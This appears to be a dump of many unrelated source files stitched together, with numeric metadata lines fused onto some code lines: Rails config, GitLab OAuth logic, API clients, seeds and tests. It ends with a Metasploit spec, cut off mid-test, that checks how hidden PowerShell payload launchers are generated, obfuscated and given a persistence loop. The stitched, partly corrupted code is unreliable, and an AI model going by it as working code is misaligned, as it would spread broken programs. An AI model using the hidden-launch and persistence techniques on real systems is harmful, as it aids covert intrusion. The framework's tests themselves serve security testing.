GTMSessionFetcher makes it easy for Cocoa applications
to perform http operations. The fetcher is implemented
as a wrapper on NSURLSession, so its behavior is asynchronous
and uses operating-system settings on iOS and Mac OS X.
DESC
s.ios.deployment_target = '9.0'
s.osx.deployment_target = '10.12'
s.tvos.deployment_target = '10.0'
s.watchos.deployment_target = '6.0'
s.default_subspec = 'Full'
s.subspec 'Core' do |sp|
sp.source_files =
'Source/GTMSessionFetcher.{h,m}',
'Source/GTMSessionFetcherLogging.{h,m}',
'Source/GTMSessionFetcherService.{h,m}',
'Source/GTMSessionUploadFetcher.{h,m}'
sp.framework = 'Security'
end
s.subspec 'Full' do |sp|
sp.source_files =
'Source/GTMGatherInputStream.{h,m}',
'Source/GTMMIMEDocument.{h,m}',
'Source/GTMReadMonitorInputStream.{h,m}'
sp.dependency 'GTMSessionFetcher/Core', "#{s.version}"
end
s.subspec 'LogView' do |sp|
# Only relevant for iOS
sp.platform = :ios
sp.source_files =
'Source/GTMSessionFetcherLogViewController.{h,m}'
sp.dependency 'GTMSessionFetcher/Core', "#{s.version}"
end
end
| 34 | 80 | 0.665724 |
21efbaeac3d447f7cbb3a9501bdf06996d7520e1 | 969 | RSpec.describe 'Inertia::Request', type: :request do
describe 'it tests whether a call is an inertia call' do
subject { response.status }
before { get inertia_request_test_path, headers: headers }
context 'it is an inertia call' do
let(:headers) { {'X-Inertia' => true} }
it { is_expected.to eq 202 }
end
context 'it is not an inertia call' do
let(:headers) { Hash.new }
it { is_expected.to eq 200 }
end
end
describe 'it tests whether a call is a partial inertia call' do
subject { response.status }
before { get inertia_partial_request_test_path, headers: headers }
context 'it is a partial inertia call' do
let(:headers) { { 'X-Inertia' => true, 'X-Inertia-Partial-Data' => 'foo,bar,baz' } }
it { is_expected.to eq 202 }
end
context 'it is not a partial inertia call' do
let(:headers) { { 'X-Inertia' => true } }
it { is_expected.to eq 200 }
end
end
end
| 26.916667 | 90 | 0.633643 |
7926dd5220f462660ca86530b302951175167eca | 523 | module SugarCRM; class Connection
# Retrieves the list of modules available to the current user logged into the system.
def get_available_modules
login! unless logged_in?
json = <<-EOF
{
"session": "#{@sugar_session_id}"
}
EOF
json.gsub!(/^\s{6}/,'')
mods = send!(:get_available_modules, json)["modules"]
modules = []
mods.each do |mod|
modules << Module.new(@session, mod)
end
modules
end
alias :get_modules :get_available_modules
end; end | 23.772727 | 89 | 0.625239 |
e8fa625d8c43718cce2dec9b2f2476a05a48fd8e | 1,568 | #
# Author:: Enrico Stahn <[email protected]>
#
# Copyright 2014, Zanui, <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "codeclimate-test-reporter"
require "simplecov"
require "coveralls"
# This module is only used to check the environment is currently a testing env
module SpecHelper
end
SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[
Coveralls::SimpleCov::Formatter,
SimpleCov::Formatter::HTMLFormatter,
CodeClimate::TestReporter::Formatter
]
SimpleCov.start
require "github_changelog_generator"
require "github_changelog_generator/task"
RSpec.configure do |config|
config.expect_with :rspec do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
config.filter_run :focus
config.run_all_when_everything_filtered = true
config.warnings = true
config.default_formatter = "doc" if config.files_to_run.one?
config.order = :random
Kernel.srand config.seed
end
| 28 | 78 | 0.777423 |
26ed38cee7135be730e2b113456f5c1a2bb0aebb | 2,049 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
# Make app the standard subdomain
config.after_initialize do
Rails.application.routes.default_url_options[:host] = 'app.lvh.me:3000'
end # after_initialize
end
| 34.15 | 85 | 0.762811 |
b933f99d246a43989745650ca3789b278c2b3548 | 8,204 | # OAuth extension for User model
#
# * Find GitLab user based on omniauth uid and provider
# * Create new user from omniauth data
#
module Gitlab
  module Auth
    module OAuth
      # Resolves an OmniAuth auth hash to a GitLab user: finds an existing
      # identity, optionally auto-links a matching LDAP account, or builds a
      # brand-new user when signup is allowed for the provider.
      class User
        prepend ::EE::Gitlab::Auth::OAuth::User

        # Raised by #save when signup is disabled and no user could be resolved.
        SignupDisabledError = Class.new(StandardError)
        # Raised by #save when sign-in via this OAuth provider is disabled.
        SigninDisabledForProviderError = Class.new(StandardError)

        attr_accessor :auth_hash, :gl_user

        # auth_hash is wrapped in an AuthHash by the #auth_hash= writer below.
        def initialize(auth_hash)
          self.auth_hash = auth_hash
          update_profile
          add_or_update_user_identities
        end

        # True when the resolved user is already stored in the database.
        def persisted?
          gl_user.try(:persisted?)
        end

        def new?
          !persisted?
        end

        def valid?
          gl_user.try(:valid?)
        end

        def valid_sign_in?
          valid? && persisted?
        end

        # Persists gl_user. Blocks the account after saving when policy
        # requires it (see #needs_blocking?). On validation failure, logs the
        # errors and returns [self, errors] instead of raising.
        def save(provider = 'OAuth')
          raise SigninDisabledForProviderError if oauth_provider_disabled?
          raise SignupDisabledError unless gl_user

          block_after_save = needs_blocking?

          Users::UpdateService.new(gl_user, user: gl_user).execute!

          gl_user.block if block_after_save

          log.info "(#{provider}) saving user #{auth_hash.email} from login with extern_uid => #{auth_hash.uid}"
          gl_user
        rescue ActiveRecord::RecordInvalid => e
          log.info "(#{provider}) Error saving user #{auth_hash.uid} (#{auth_hash.email}): #{gl_user.errors.full_messages}"
          return self, e.record.errors
        end

        # Memoized; `defined?` (rather than ||=) so a nil result is cached too.
        def gl_user
          return @gl_user if defined?(@gl_user)

          @gl_user = find_user
        end

        # Lookup order: existing identity, then LDAP auto-link, then a newly
        # built user (when signup is enabled for this provider).
        def find_user
          user = find_by_uid_and_provider

          user ||= find_or_build_ldap_user if auto_link_ldap_user?
          user ||= build_new_user if signup_enabled?

          user.external = true if external_provider? && user&.new_record?

          user
        end

        def find_and_update!
          save if should_save?

          gl_user
        end

        protected

        # Subclasses (e.g. via the EE prepend) may override to skip saving.
        def should_save?
          true
        end

        # Ensures gl_user has an identity for this provider/uid, and builds an
        # LDAP identity as well when auto-linking found an LDAP person.
        def add_or_update_user_identities
          return unless gl_user

          # find_or_initialize_by doesn't update `gl_user.identities`, and isn't autosaved.
          identity = gl_user.identities.find { |identity| identity.provider == auth_hash.provider }

          identity ||= gl_user.identities.build(provider: auth_hash.provider)
          identity.extern_uid = auth_hash.uid

          if auto_link_ldap_user? && !gl_user.ldap_user? && ldap_person
            log.info "Correct LDAP account has been found. identity to user: #{gl_user.username}."
            gl_user.identities.build(provider: ldap_person.provider, extern_uid: ldap_person.dn)
          end
        end

        # Returns the existing GitLab user for the matched LDAP person, or
        # builds a new user when none exists yet.
        def find_or_build_ldap_user
          return unless ldap_person

          user = Gitlab::Auth::LDAP::User.find_by_uid_and_provider(ldap_person.dn, ldap_person.provider)
          if user
            log.info "LDAP account found for user #{user.username}. Building new #{auth_hash.provider} identity."
            return user
          end

          log.info "No user found using #{auth_hash.provider} provider. Creating a new one."
          build_new_user
        end

        def find_by_email
          return unless auth_hash.has_attribute?(:email)

          ::User.find_by(email: auth_hash.email.downcase)
        end

        def auto_link_ldap_user?
          Gitlab.config.omniauth.auto_link_ldap_user
        end

        def creating_linked_ldap_user?
          auto_link_ldap_user? && ldap_person
        end

        # Memoized (nil cached via `defined?`): first LDAP person matching the
        # OAuth uid across all configured LDAP providers.
        def ldap_person
          return @ldap_person if defined?(@ldap_person)

          # Look for a corresponding person with same uid in any of the configured LDAP providers
          Gitlab::Auth::LDAP::Config.providers.each do |provider|
            adapter = Gitlab::Auth::LDAP::Adapter.new(provider)
            @ldap_person = find_ldap_person(auth_hash, adapter)
            break if @ldap_person
          end
          @ldap_person
        end

        # Tries uid, then email, then DN lookups; connection failures are
        # treated as "not found" (returns nil).
        def find_ldap_person(auth_hash, adapter)
          Gitlab::Auth::LDAP::Person.find_by_uid(auth_hash.uid, adapter) ||
            Gitlab::Auth::LDAP::Person.find_by_email(auth_hash.uid, adapter) ||
            Gitlab::Auth::LDAP::Person.find_by_dn(auth_hash.uid, adapter)
        rescue Gitlab::Auth::LDAP::LDAPConnectionError
          nil
        end

        def ldap_config
          Gitlab::Auth::LDAP::Config.new(ldap_person.provider) if ldap_person
        end

        def needs_blocking?
          new? && block_after_signup?
        end

        # allow_single_sign_on may be a provider whitelist (Array) or a
        # boolean-like value enabling/disabling signup globally.
        def signup_enabled?
          providers = Gitlab.config.omniauth.allow_single_sign_on

          if providers.is_a?(Array)
            providers.include?(auth_hash.provider)
          else
            providers
          end
        end

        def external_provider?
          Gitlab.config.omniauth.external_providers.include?(auth_hash.provider)
        end

        # LDAP-linked accounts follow the LDAP blocking policy; otherwise the
        # global omniauth policy applies.
        def block_after_signup?
          if creating_linked_ldap_user?
            ldap_config.block_auto_created_users
          else
            Gitlab.config.omniauth.block_auto_created_users
          end
        end

        def auth_hash=(auth_hash)
          @auth_hash = AuthHash.new(auth_hash)
        end

        def find_by_uid_and_provider
          identity = Identity.with_extern_uid(auth_hash.provider, auth_hash.uid).take

          identity&.user
        end

        # Builds (does not persist) a user; confirmation is skipped because
        # the OAuth provider already vouched for the email.
        def build_new_user
          user_params = user_attributes.merge(skip_confirmation: true)
          Users::BuildService.new(nil, user_params).execute(skip_authorization: true)
        end

        # Attributes for a newly built user, with the username made unique and
        # path-safe via Namespace.clean_path + Uniquify.
        def user_attributes
          # Give preference to LDAP for sensitive information when creating a linked account
          if creating_linked_ldap_user?
            username = ldap_person.username.presence
            email = ldap_person.email.first.presence
          end

          username ||= auth_hash.username
          email ||= auth_hash.email

          valid_username = ::Namespace.clean_path(username)

          uniquify = Uniquify.new
          valid_username = uniquify.string(valid_username) { |s| !NamespacePathValidator.valid_path?(s) }

          name = auth_hash.name
          # Fall back to the username when the provider gave no usable name.
          name = valid_username if name.strip.empty?

          {
            name: name,
            username: valid_username,
            email: email,
            password: auth_hash.password,
            password_confirmation: auth_hash.password,
            password_automatically_set: true
          }
        end

        def sync_profile_from_provider?
          Gitlab::Auth::OAuth::Provider.sync_profile_from_provider?(auth_hash.provider)
        end

        # Copies syncable attributes from the auth hash (and/or marks the
        # email as LDAP-synced) and records which attributes were synced in
        # the user's synced-attributes metadata.
        def update_profile
          clear_user_synced_attributes_metadata

          return unless sync_profile_from_provider? || creating_linked_ldap_user?

          metadata = gl_user.build_user_synced_attributes_metadata

          if sync_profile_from_provider?
            UserSyncedAttributesMetadata::SYNCABLE_ATTRIBUTES.each do |key|
              if auth_hash.has_attribute?(key) && gl_user.sync_attribute?(key)
                gl_user[key] = auth_hash.public_send(key) # rubocop:disable GitlabSecurity/PublicSend
                metadata.set_attribute_synced(key, true)
              else
                metadata.set_attribute_synced(key, false)
              end
            end

            metadata.provider = auth_hash.provider
          end

          if creating_linked_ldap_user? && gl_user.email == ldap_person.email.first
            metadata.set_attribute_synced(:email, true)
            metadata.provider = ldap_person.provider
          end
        end

        def clear_user_synced_attributes_metadata
          gl_user&.user_synced_attributes_metadata&.destroy
        end

        def log
          Gitlab::AppLogger
        end

        def oauth_provider_disabled?
          Gitlab::CurrentSettings.current_application_settings
                                 .disabled_oauth_sign_in_sources
                                 .include?(auth_hash.provider)
        end
      end
    end
  end
end
| 30.958491 | 123 | 0.615553 |
1a8f73613a126ee080e6cdb9036cf85d4e2bc242 | 562 | # frozen_string_literal: true
require 'rails_helper'
# View spec for the collection metadata form partial.
describe "collections/_form_metadata.html.erb" do
  let(:collection) { build(:collection) }
  let(:form) { Sufia::Forms::CollectionForm.new(collection) }

  # Renders the partial inside a simple_form builder and wraps the rendered
  # markup in a Capybara node so selector matchers work on it.
  let(:page) do
    view.simple_form_for form do |f|
      render 'collections/form_metadata.html.erb', f: f
    end
    Capybara::Node::Simple.new(rendered)
  end

  # The permissions partial is irrelevant to this spec, so stub it out.
  before { stub_template 'collections/_form_permission.html.erb' => '' }

  it "renders the metadata fields" do
    expect(page).to have_selector("input#collection_title")
  end
end
| 26.761905 | 72 | 0.711744 |
# Returns the product of the two numbers +x+ and +y+.
# (Original first line was corrupted by fused dataset metadata; restored.)
def multiply(x, y)
  x * y
end
# Interactive demo: read two integers from stdin and print their product.
# (Trailing dataset metadata fused onto the last line — a syntax error —
# has been removed; program text is otherwise unchanged.)
print "Insert the first integer number: "
num1 = gets.chomp.to_i
print "Insert the second integer number: "
num2 = gets.chomp.to_i
# Output is intentionally compact, e.g. "3*4=12".
puts "#{num1}*#{num2}=#{multiply(num1,num2)}"
e809106f0a323acb1e65a53ca20e24d10fcc8142 | 156 | # This file is used by Rack-based servers to start the application.
# Boot the Rails environment, then hand the application to the Rack server.
require ::File.expand_path('../config/environment', __FILE__)
run Molamp::Application
| 31.2 | 67 | 0.769231 |
ed4bfbbee6f476646f498ca5a63266b1759cfb76 | 219 | require "rack/pooledthrottle/version"
require 'rack'
require 'connection_pool'
require 'rack/pooledthrottle/throttle'
require 'rack/pooledthrottle/memcached_throttle'
# Namespace marker for the gem; the middleware classes themselves are
# defined in the files required above.
module Rack
  module PooledThrottle
  end
end
| 18.25 | 48 | 0.808219 |
21835d80267700dce5f21b8251de0e50394f0682 | 3,104 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
# Seed data: one admin plus three regular users, three projects, the
# user<->project join rows, one video per project, and three comments per
# video. All passwords are the literal string "password" (dev/test only).
admin = User.create(user_name: "admin", email: "[email protected]", password: "password", admin: true)
user01 = User.create(user_name: "user01", email: "[email protected]", password: "password", admin: false)
user02 = User.create(user_name: "user02", email: "[email protected]", password: "password", admin: false)
user03 = User.create(user_name: "user03", email: "[email protected]", password: "password", admin: false)

#PROJECTS
project01 = Project.create(project_name: 'Project 01', description: 'Promo video for AWS and Pitney Bowes')
project02 = Project.create(project_name: 'Project 02', description: 'Promo video for Autodesk featuring AutoCAD')
project03 = Project.create(project_name: 'Project 03', description: 'Promo video for Splunk')

#UsersProject — join rows assigning users to projects.
userproject01 = Userproject.create(user_id: user01.id, project_id: project01.id)
userproject02 = Userproject.create(user_id: user02.id, project_id: project02.id)
userproject03 = Userproject.create(user_id: user01.id, project_id: project02.id)
userproject04 = Userproject.create(user_id: user03.id, project_id: project01.id)
userproject05 = Userproject.create(user_id: user02.id, project_id: project01.id)

#VIDEOS — one Vimeo-hosted video per project; only video01 is pre-approved.
video01 = Video.create(url:'https://player.vimeo.com/video/225178837',version: 1, video_name: 'AWS | Pitney Bowes', project_id: project01.id, approval: true)
video02 = Video.create(url:'https://player.vimeo.com/video/226518977',version: 1, video_name: 'AutoCAD | Behind the Scenes', project_id: project02.id)
video03 = Video.create(url:'https://player.vimeo.com/video/217564062', version: 1, video_name: 'SPLUNK', project_id: project03.id)

#COMMENTS — all timecodes start at "00:00:00".
#comment01 = Comment.create(content: 'Video 1 Comment 01a', timecode: Time.new(2015, 12, 8, 10, 19), user_id:user01.id, video_id:video01.id)
comment02 = Comment.create(content: 'Video 1 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video01.id)
comment03 = Comment.create(content: 'Video 1 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video01.id)
comment04 = Comment.create(content: 'Video 2 Comment 01', timecode: "00:00:00", user_id:user01.id, video_id:video02.id)
comment05 = Comment.create(content: 'Video 2 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video02.id)
comment06 = Comment.create(content: 'Video 2 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video02.id)
comment07 = Comment.create(content: 'Video 3 Comment 01', timecode: "00:00:00", user_id:user01.id, video_id:video03.id)
comment08 = Comment.create(content: 'Video 3 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video03.id)
comment09 = Comment.create(content: 'Video 3 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video03.id)
| 57.481481 | 157 | 0.750322 |
e20af2c7f1d7e05e13d098cd53c3d964969f8c8c | 503 | require 'rake'
# Mixed into specs under spec/tasks/: exposes the rake task named by the
# outermost describe string (e.g. `describe "rake foo:bar"`) as `task`.
module TaskExampleGroup
  extend ActiveSupport::Concern

  included do
    # "rake foo:bar" => "foo:bar"
    let(:task_name) { self.class.top_level_description.sub(/\Arake /, '') }
    let(:tasks) { Rake::Task }

    subject(:task) { tasks[task_name] }
  end
end

RSpec.configure do |config|
  # Tag every spec file under spec/tasks/ as type: :task automatically.
  config.define_derived_metadata(file_path: %r{/spec/tasks/}) do |metadata|
    metadata[:type] = :task
  end

  config.include TaskExampleGroup, type: :task

  # Rake tasks must be loaded once before any task spec runs.
  config.before(:suite) do
    Rails.application.load_tasks
  end
end
| 20.12 | 75 | 0.701789 |
module BittrexRb
  module Endpoints
    # Market endpoints of the Bittrex API: placing and cancelling limit
    # orders. Requests go through Base#sget (presumably a signed GET —
    # see Base; confirm there) and responses are wrapped in
    # BittrexRb::Response::Market.
    # (Original first line was corrupted by fused dataset metadata; restored.)
    class Market < Base
      # Places a limit buy order.
      #
      # pair     - required - a string literal for the market (ex: BTC-LTC)
      # quantity - required - the amount to purchase
      # rate     - required - the rate at which to place the order
      def buylimit(pair, quantity, rate)
        res = sget("/buylimit", {market: pair, quantity: quantity, rate: rate})
        ::BittrexRb::Response::Market.new(res)
      end

      # Places a limit sell order.
      #
      # pair     - required - a string literal for the market (ex: BTC-LTC)
      # quantity - required - the amount to sell
      # rate     - required - the rate at which to place the order
      def selllimit(pair, quantity, rate)
        res = sget("/selllimit", {market: pair, quantity: quantity, rate: rate})
        ::BittrexRb::Response::Market.new(res)
      end

      # Cancels a previously placed buy or sell order.
      #
      # uuid - required - uuid of the buy or sell order
      def cancelorder(uuid)
        res = sget("/cancel", {uuid: uuid})
        ::BittrexRb::Response::Market.new(res)
      end

      # All calls in this class live under the /market URI segment.
      def uri_modifier
        '/market'
      end
    end
  end
end
| 33.628571 | 80 | 0.621071 |
# (Original first line was corrupted by fused dataset metadata; restored.)
RSpec.describe Deckrefcard do
  # Smoke test from the gem scaffold: the VERSION constant must be defined.
  it "has a version number" do
    expect(Deckrefcard::VERSION).not_to be nil
  end

  # NOTE(review): this is the bundler-generated placeholder example and
  # intentionally fails; replace it with a real example once the gem has
  # behavior worth specifying.
  it "does something useful" do
    expect(false).to eq(true)
  end
end
| 18.7 | 46 | 0.71123 |
187f463977ef91a0f6c91b543c9fb271e50dcf34 | 2,303 | # frozen_string_literal: true
require 'yaml'
# InSpec control: the rendered map.jinja data must match the per-platform
# reference file checked into the profile.
control 'postgresql-replication._mapdata' do
  title '`map.jinja` should match the reference file'

  ### Method
  # The steps below for each file appear convoluted but they are both required
  # and similar in nature:
  # 1. The earliest method was to simply compare the files textually but this often
  #    led to false positives due to inconsistencies (e.g. spacing, ordering)
  # 2. The next method was to load the files back into YAML structures and then
  #    compare but InSpec provided block diffs this way, unusable by end users
  # 3. The final step was to dump the YAML structures back into a string to use
  #    for the comparison; this both worked and provided human-friendly diffs

  ### Comparison file for the specific platform
  ### Static, adjusted as part of code contributions, as map data is changed
  # Strip the `platform[:finger]` version number down to the "OS major release"
  platform_finger = system.platform[:finger].split('.').first.to_s
  # Use that to set the path to the file (relative to the InSpec suite directory)
  mapdata_file_path = "_mapdata/#{platform_finger}.yaml"
  # Load the mapdata from profile, into a YAML structure
  # https://docs.chef.io/inspec/profiles/#profile-files
  mapdata_file_yaml = YAML.load(inspec.profile.file(mapdata_file_path))
  # Dump the YAML back into a string for comparison
  mapdata_file_dump = YAML.dump(mapdata_file_yaml)

  ### Output file produced by running the `_mapdata` state
  ### Dynamic, generated during Kitchen's `converge` phase
  # Derive the location of the dumped mapdata (differs for Windows)
  output_dir = platform[:family] == 'windows' ? '/temp' : '/tmp'
  # Use that to set the path to the file (absolute path, i.e. within the container)
  output_file_path = "#{output_dir}/salt_mapdata_dump.yaml"
  # Load the output into a YAML structure using InSpec's `yaml` resource
  # https://github.com/inspec/inspec/blob/49b7d10/lib/inspec/resources/yaml.rb#L29
  output_file_yaml = yaml(output_file_path).params
  # Dump the YAML back into a string for comparison
  output_file_dump = YAML.dump(output_file_yaml)

  # Comparing the normalised dumps yields a readable line diff on failure.
  describe 'File content' do
    it 'should match profile map data exactly' do
      expect(output_file_dump).to eq(mapdata_file_dump)
    end
  end
end
| 47.979167 | 83 | 0.746418 |
f8136989675cb2d561dbfbc5017134f1b6c5375b | 1,688 | # coding: utf-8
# Make lib/ requirable so the version file can be loaded below.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rails_select_on_includes/version'

Gem::Specification.new do |spec|
  spec.name          = "rails_select_on_includes"
  spec.version       = RailsSelectOnIncludes::VERSION
  spec.authors       = ["alekseyl"]
  spec.email         = ["[email protected]"]

  spec.summary       = %q{Patching rails include/select/virtual attributes issue}
  spec.description   = %q{Patching rails include/select/virtual attributes issue ( https://github.com/rails/rails/issues/15185 )}
  spec.homepage      = "https://github.com/alekseyl/rails_select_on_includes"
  spec.license       = "MIT"

  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
  # to allow pushing to a single host or delete this section to allow pushing to any host.
  if spec.respond_to?(:metadata)
    spec.metadata['allowed_push_host'] = "https://rubygems.org"
  else
    raise "RubyGems 2.0 or newer is required to protect against " \
      "public gem pushes."
  end

  # Package every git-tracked file except tests, specs and features.
  spec.files = `git ls-files -z`.split("\x0").reject do |f|
    f.match(%r{^(test|spec|features)/})
  end
  spec.bindir        = "exe"
  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ["lib"]

  spec.add_dependency "activerecord", ">=5.2.1"

  spec.add_development_dependency "rails", ">=5.2.1"
  spec.add_development_dependency "bundler", "~> 1.13"
  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency 'sqlite3'
  spec.add_development_dependency 'byebug'
  spec.add_development_dependency 'niceql'
end
| 38.363636 | 129 | 0.697275 |
f774a23dfd8b64446a5fda2089b9757df2b09786 | 713 | require 'push_type_core'
require 'push_type_api'
require 'coffee-rails'
require 'sass-rails'
require 'haml-rails'
require 'foundation-rails'
require 'foundation-icons-sass-rails'
require 'jquery-rails'
require 'pickadate-rails'
require 'selectize-rails'
require 'codemirror-rails'
require 'wysiwyg-rails'
require 'font-awesome-rails'
require 'turbolinks'
require 'breadcrumbs'
require 'kaminari'
require 'premailer/rails'
module PushType
  # Memoized accessor for the admin asset registry.
  #
  # Uses a module-level instance variable instead of the previous class
  # variable (@@admin_assets): class variables are shared across the whole
  # ancestor chain and are discouraged by the Ruby style guide, while the
  # module ivar keeps the cache private to PushType. The public interface
  # (PushType.admin_assets) is unchanged.
  def self.admin_assets
    @admin_assets ||= PushType::Admin::Assets.new
  end

  module Admin
    # Registers and mounts this engine under the 'admin' path in the host app.
    PushType.register_engine self, mount: 'admin'
  end
end
require 'push_type/admin/assets'
require 'push_type/admin/engine'
require 'push_type/breadcrumbs/foundation'
| 19.27027 | 50 | 0.776999 |
28875a74ced67b2d085ceac64e8a2b74374b6499 | 15,599 | # -*- coding:binary -*-
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/powershell'
# Spec helper: expands compressed PowerShell produced by the mixin back to
# readable script text so examples can inspect the generated code.
def decompress(code)
  script = Rex::Exploitation::Powershell::Script.new(code)
  script.decompress_code
end
describe Msf::Exploit::Powershell do
  # A bare Msf::Exploit with the Powershell mixin extended in; allocate +
  # send(:initialize, {}) avoids needing full module metadata.
  subject do
    mod = Msf::Exploit.allocate
    mod.extend described_class
    mod.send(:initialize, {})
    mod.datastore['Verbose'] = true
    mod
  end

  # Sample script shipped with the framework, used as input throughout.
  let(:example_script) do
    File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
  end

  # Random alpha payload stands in for real shellcode.
  let(:payload) do
    Rex::Text.rand_text_alpha(120)
  end

  let(:arch) do
    'x86'
  end

  describe "::encode_script" do
    it 'should read and encode a sample script file' do
      script = subject.encode_script(example_script)
      script.should be
      script.length.should be > 0
    end
  end
describe "::compress_script" do
context 'when default datastore is set' do
it 'should create a compressed script' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
compressed.include?('IO.Compression').should be_truthy
end
it 'should create a compressed script with eof' do
script = File.read(example_script)
compressed = subject.compress_script(script, 'end_of_file')
compressed.include?('end_of_file').should be_truthy
end
end
context 'when strip_comments is true' do
before do
subject.datastore['Powershell::strip_comments'] = true
subject.options.validate(subject.datastore)
end
it 'should strip comments' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
end
end
context 'when strip_comment is false' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt strip comments' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
end
end
context 'when strip_whitespace is true' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.datastore['Powershell::strip_whitespace'] = true
subject.options.validate(subject.datastore)
end
it 'should strip whitespace' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).length.should be < script.length
end
end
context 'when strip_whitespace is false' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.datastore['Powershell::strip_whitespace'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt strip whitespace' do
script = File.read(example_script)
compressed = subject.compress_script(script)
expect(decompress(compressed).length).to eq(script.length)
end
end
context 'when sub_vars is true' do
before do
subject.datastore['Powershell::sub_vars'] = true
subject.options.validate(subject.datastore)
end
it 'should substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('$hashes').should be_falsey
end
end
context 'when sub_vars is false' do
before do
subject.datastore['Powershell::sub_vars'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('$hashes').should be_truthy
end
end
context 'when sub_funcs is true' do
before do
subject.datastore['Powershell::sub_funcs'] = true
subject.options.validate(subject.datastore)
end
it 'should substitute functions' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('DumpHashes').should be_falsey
end
end
context 'when sub_funcs is false' do
before do
subject.datastore['Powershell::sub_funcs'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('DumpHashes').should be_truthy
end
end
end
describe "::run_hidden_psh" do
let(:encoded) do
false
end
context 'when x86 payload' do
it 'should generate code' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('syswow64').should be_truthy
end
end
context 'when x64 payload' do
it 'should generate code' do
code = subject.run_hidden_psh(payload, 'x86_64', encoded)
code.include?('sysnative').should be_truthy
end
end
context 'when encoded' do
it 'should generate a code including an encoded command' do
code = subject.run_hidden_psh(payload, arch, true)
code.include?('-nop -w hidden -e ').should be_truthy
end
end
context 'when command' do
it 'should generate code including a -c command' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('-nop -w hidden -c ').should be_truthy
end
end
context 'when old' do
before do
subject.datastore['Powershell::method'] = 'old'
subject.options.validate(subject.datastore)
end
it 'should generate a code including unshorted args' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_truthy
end
end
end
describe "::cmd_psh_payload" do
context 'when payload is huge' do
it 'should raise an exception' do
except = false
begin
code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
rescue RuntimeError => e
except = true
end
except.should be_truthy
end
end
context 'when persist is true' do
before do
subject.datastore['Powershell::persist'] = true
subject.options.validate(subject.datastore)
end
it 'should add a persistance loop' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('while(1){Start-Sleep -s ').should be_truthy
end
end
context 'when persist is false' do
before do
subject.datastore['Powershell::persist'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt add a persistance loop' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('while(1){Start-Sleep -s ').should be_falsey
end
end
context 'when prepend_sleep is set' do
before do
subject.datastore['Powershell::prepend_sleep'] = 5
subject.options.validate(subject.datastore)
end
it 'should prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
